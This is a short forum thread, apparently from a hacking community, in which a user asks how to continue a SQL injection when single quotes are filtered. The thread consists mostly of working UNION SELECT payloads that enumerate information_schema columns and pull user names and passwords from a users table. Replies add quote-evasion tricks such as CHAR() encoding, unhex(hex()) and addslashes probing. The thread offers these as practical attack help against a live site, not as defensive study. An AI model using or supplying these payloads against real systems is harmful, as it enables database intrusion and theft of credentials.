SQLi with character filters - how to

hey guys. how do I proceed with SQLi when seems to be some sort of character filter.

whenever I use ', for example, I get an error. That becomes an issue when I try something like:

UNION ALL SELECT 1,2,column_name,4 FROM information_schema.columns WHERE table_name='table'–

I've tried using things like table_name=CHR(39)||table||CHR(39) with no success.

Any ideas? :ninja:

it's char(12,34,45,56).

not sure if chr() is a valid command. If you run into filters, try to replicate them and test locally.

http://wocares.com/noquote.php

http://hackvertor.co.uk

thanks for the tips guys, but still no results.

I tried these inputs:

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(0x27,users,0x27)–

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)usersCHAR(39)–

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CHAR(39)||users||CHAR(39)–

union all select null,null,column_name,null,null,null,null,null from information_schema.columns where table_name=CONCAT(CHAR(39),users,CHAR(39))–

I've also tried substituting ='users' and 'users' for CHAR(xxx). no cigar.

It is strange that the first one doesn't work, because if I try something like:

union all select null,null,CONCAT(users,0x27,pass),null,null,null,null,null from users–

it works…. so it shouldn't be a problem with CONCAT.

Any more ideas?

It should be something like WHERE table_name=char(1,2,3,4)

Have you tried the unhex(hex()) method - that always seems to work for me.

and its also worth adding a \ character before your single quotes to see if their still using addslashes or something equally pathetic.

You might want to have a look here :

http://www.youtube.com/watch?v=EWQoAoJix2I